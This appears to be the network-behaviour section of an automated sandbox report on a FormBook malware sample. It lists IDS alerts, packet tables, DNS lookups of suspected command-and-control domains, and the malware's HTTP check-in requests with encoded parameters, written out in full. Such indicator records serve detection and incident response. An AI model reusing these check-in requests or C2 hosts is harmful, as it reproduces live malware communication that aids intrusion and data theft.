                                                                                                                                                                                                            Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . L K G , . . . . . . . . . D . . & ! . . . . q W y A . . 2 . . . . . . . . . . j % g . . 5 1 . . i ( . . . . . ! . . . . . . . ' .
                                                                                                                                                                                                            Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                                            Snort IDS Alerts

                                                                                                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            01/27/21-07:17:57.296984TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.2223.228.109.141
                                                                                                                                                                                                            01/27/21-07:17:57.296984TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.2223.228.109.141
                                                                                                                                                                                                            01/27/21-07:17:57.296984TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.2223.228.109.141
                                                                                                                                                                                                            01/27/21-07:18:42.688552TCP1201ATTACK-RESPONSES 403 Forbidden804917234.102.136.180192.168.2.22

                                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.443556070 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.483587027 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.483707905 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.499522924 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.539551973 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.540241003 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.540261030 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.540339947 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.555241108 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.595813036 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.595940113 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.596012115 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.810049057 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.850191116 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870322943 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870354891 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870367050 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870373964 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870384932 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870398045 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870405912 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870421886 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870439053 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870455027 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870466948 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870479107 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870491028 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870502949 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870505095 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870521069 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870532990 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870537043 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870553017 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870572090 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870584965 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870593071 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870626926 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870659113 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870779037 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870857000 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870917082 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870939016 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870955944 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870970964 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870979071 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.870986938 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871001005 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871002913 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871018887 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871035099 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871043921 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871051073 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871063948 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871079922 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871088028 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871093035 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871108055 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871144056 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871476889 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871536016 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871608019 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871619940 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871679068 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871690035 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871695995 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871711969 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871728897 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871737003 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871742010 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871758938 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871772051 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871776104 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871788025 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871802092 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871807098 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871819019 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871831894 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871831894 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871851921 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871870041 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871872902 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871889114 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871897936 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871906042 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871927977 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.871963978 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.872484922 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.872504950 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.872517109 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.872529030 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.872540951 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.872591972 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.872618914 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.888056040 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.889067888 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.910651922 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.910676956 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.910692930 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.910705090 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.910721064 CET44349165162.159.130.233192.168.2.22

                                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.324239016 CET5219753192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.372081041 CET53521978.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.372427940 CET5219753192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.420120955 CET53521978.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:17:46.161165953 CET5309953192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 27, 2021 07:17:46.307773113 CET53530998.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:17:56.738931894 CET5283853192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 27, 2021 07:17:57.100617886 CET53528388.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:02.556963921 CET6120053192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 27, 2021 07:18:02.707968950 CET53612008.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:08.064954996 CET4954853192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 27, 2021 07:18:08.495318890 CET53495488.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:13.514302015 CET5562753192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 27, 2021 07:18:13.589848042 CET53556278.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:20.913451910 CET5600953192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 27, 2021 07:18:20.997838020 CET53560098.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:26.130702972 CET6186553192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 27, 2021 07:18:26.221211910 CET53618658.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:31.230568886 CET5517153192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 27, 2021 07:18:31.293970108 CET53551718.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:36.463534117 CET5249653192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 27, 2021 07:18:36.822276115 CET53524968.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:42.442558050 CET5756453192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 27, 2021 07:18:42.506495953 CET53575648.8.8.8192.168.2.22

                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.324239016 CET192.168.2.228.8.8.80x659bStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.372427940 CET192.168.2.228.8.8.80x659bStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:17:46.161165953 CET192.168.2.228.8.8.80xa14dStandard query (0)www.land-il.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:17:56.738931894 CET192.168.2.228.8.8.80xccffStandard query (0)www.fsjinhua.netA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:02.556963921 CET192.168.2.228.8.8.80x2f03Standard query (0)www.chenangopistolpermit.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:08.064954996 CET192.168.2.228.8.8.80x3c4eStandard query (0)www.chuanxingtong.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:13.514302015 CET192.168.2.228.8.8.80x6ec7Standard query (0)www.aulbalu.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:20.913451910 CET192.168.2.228.8.8.80xf09aStandard query (0)www.streamelemeants.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:26.130702972 CET192.168.2.228.8.8.80x18f7Standard query (0)www.dchasers.netA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:31.230568886 CET192.168.2.228.8.8.80x4b93Standard query (0)www.mct.ltdA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:36.463534117 CET192.168.2.228.8.8.80x9e1cStandard query (0)www.bmtxm.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:42.442558050 CET192.168.2.228.8.8.80xa0e8Standard query (0)www.aspiringeyephotos.comA (IP address)IN (0x0001)

                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.372081041 CET8.8.8.8192.168.2.220x659bNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.372081041 CET8.8.8.8192.168.2.220x659bNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.372081041 CET8.8.8.8192.168.2.220x659bNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.372081041 CET8.8.8.8192.168.2.220x659bNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.372081041 CET8.8.8.8192.168.2.220x659bNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.420120955 CET8.8.8.8192.168.2.220x659bNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.420120955 CET8.8.8.8192.168.2.220x659bNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.420120955 CET8.8.8.8192.168.2.220x659bNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.420120955 CET8.8.8.8192.168.2.220x659bNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.420120955 CET8.8.8.8192.168.2.220x659bNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:17:46.307773113 CET8.8.8.8192.168.2.220xa14dNo error (0)www.land-il.comland-il.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:17:46.307773113 CET8.8.8.8192.168.2.220xa14dNo error (0)land-il.com50.87.169.249A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:17:57.100617886 CET8.8.8.8192.168.2.220xccffNo error (0)www.fsjinhua.net23.228.109.141A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:02.707968950 CET8.8.8.8192.168.2.220x2f03No error (0)www.chenangopistolpermit.com208.92.209.208A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:08.495318890 CET8.8.8.8192.168.2.220x3c4eName error (3)www.chuanxingtong.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:13.589848042 CET8.8.8.8192.168.2.220x6ec7Name error (3)www.aulbalu.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:20.997838020 CET8.8.8.8192.168.2.220xf09aNo error (0)www.streamelemeants.com81.17.18.195A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:26.221211910 CET8.8.8.8192.168.2.220x18f7Name error (3)www.dchasers.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:31.293970108 CET8.8.8.8192.168.2.220x4b93No error (0)www.mct.ltd104.21.47.75A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:31.293970108 CET8.8.8.8192.168.2.220x4b93No error (0)www.mct.ltd172.67.170.169A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:36.822276115 CET8.8.8.8192.168.2.220x9e1cNo error (0)www.bmtxm.com103.209.233.78A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:42.506495953 CET8.8.8.8192.168.2.220xa0e8No error (0)www.aspiringeyephotos.comaspiringeyephotos.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:42.506495953 CET8.8.8.8192.168.2.220xa0e8No error (0)aspiringeyephotos.com34.102.136.180A (IP address)IN (0x0001)

                                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                                            • www.land-il.com
                                                                                                                                                                                                            • www.fsjinhua.net
                                                                                                                                                                                                            • www.chenangopistolpermit.com
                                                                                                                                                                                                            • www.streamelemeants.com
                                                                                                                                                                                                            • www.mct.ltd
                                                                                                                                                                                                            • www.bmtxm.com

                                                                                                                                                                                                            HTTP Packets

                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                            0192.168.2.224916650.87.169.24980C:\Windows\explorer.exe
                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                            Jan 27, 2021 07:17:46.510798931 CET818OUTGET /j5an/?3fk=jkLgRzxvTxu7277EKfJN7tKRHYJxZ3c6o/hCpD9wXnjOSj4zaLYT7gQTd+fjCtE9cXdA/Q==&9rO4=E4xhcD5XlJSXW HTTP/1.1
                                                                                                                                                                                                            Host: www.land-il.com
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Jan 27, 2021 07:17:46.720585108 CET819INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Wed, 27 Jan 2021 06:17:46 GMT
                                                                                                                                                                                                            Server: nginx/1.19.5
                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                            Content-Length: 315
                                                                                                                                                                                                            host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                            1192.168.2.224916723.228.109.14180C:\Windows\explorer.exe
                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                            Jan 27, 2021 07:17:57.296983957 CET819OUTGET /j5an/?3fk=BfKEObTbW9oeHG2CUMZ3KrmdYmDHtBO1kpWmA720me2b6REnQWjK/QX53PULeTYyqxmJdg==&9rO4=E4xhcD5XlJSXW HTTP/1.1
                                                                                                                                                                                                            Host: www.fsjinhua.net
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Jan 27, 2021 07:17:57.535023928 CET820INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 27 Jan 2021 06:17:57 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            X-Powered-By: PHP/7.0.33
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                            2192.168.2.2249168208.92.209.20880C:\Windows\explorer.exe
                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                            Jan 27, 2021 07:18:02.882548094 CET821OUTGET /j5an/?3fk=D+cSBfecKrY0H0Gt53ME+eVK9rvQq54hSBUKdB1Y0k0nsfYDitv2SyHvmR9bpLZA/9+mqA==&9rO4=E4xhcD5XlJSXW HTTP/1.1
                                                                                                                                                                                                            Host: www.chenangopistolpermit.com
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Jan 27, 2021 07:18:03.057116985 CET821INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Location: https://chenangopistolpermit.com/j5an/?3fk=D+cSBfecKrY0H0Gt53ME+eVK9rvQq54hSBUKdB1Y0k0nsfYDitv2SyHvmR9bpLZA/9+mqA==&9rO4=E4xhcD5XlJSXW
                                                                                                                                                                                                            Server: Microsoft-IIS/10.0
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                            Date: Wed, 27 Jan 2021 06:17:57 GMT
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Content-Length: 261
                                                                                                                                                                                                            Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 63 68 65 6e 61 6e 67 6f 70 69 73 74 6f 6c 70 65 72 6d 69 74 2e 63 6f 6d 2f 6a 35 61 6e 2f 3f 33 66 6b 3d 44 2b 63 53 42 66 65 63 4b 72 59 30 48 30 47 74 35 33 4d 45 2b 65 56 4b 39 72 76 51 71 35 34 68 53 42 55 4b 64 42 31 59 30 6b 30 6e 73 66 59 44 69 74 76 32 53 79 48 76 6d 52 39 62 70 4c 5a 41 2f 39 2b 6d 71 41 3d 3d 26 61 6d 70 3b 39 72 4f 34 3d 45 34 78 68 63 44 35 58 6c 4a 53 58 57 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e
                                                                                                                                                                                                            Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://chenangopistolpermit.com/j5an/?3fk=D+cSBfecKrY0H0Gt53ME+eVK9rvQq54hSBUKdB1Y0k0nsfYDitv2SyHvmR9bpLZA/9+mqA==&amp;9rO4=E4xhcD5XlJSXW">here</a></body>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                            3192.168.2.224916981.17.18.19580C:\Windows\explorer.exe
                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                            Jan 27, 2021 07:18:21.049287081 CET822OUTGET /j5an/?3fk=hrvp4+cUQU8zV/SJvc4Npds81eds1Wb4LfPiDx6kUcwrGKBrK/T3B2SdIv8rg9j1CS48fg==&9rO4=E4xhcD5XlJSXW HTTP/1.1
